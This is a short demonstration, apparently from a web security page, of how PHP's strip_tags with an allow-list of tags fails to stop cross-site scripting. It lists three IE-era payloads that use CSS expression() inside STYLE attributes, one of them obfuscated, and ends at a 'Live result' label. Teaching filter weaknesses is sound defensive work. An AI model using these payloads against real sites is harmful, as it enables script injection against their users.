This script uses a standard PHP function strip_tags which is typically used to prevent code injection into web applications. The function in this example is called with a reasonable set of allowable tags, namely: <p><a><img><b><table><tr><td><div>.

As it turns out, some types of code still pass around it. Please try:

• Internet Explorer
  • <DIV STYLE="width: expression(alert('XSS'));">
  • <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
  • exp/*<A STYLE='no\xss:noxss("*//*"); xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>

"Live" result: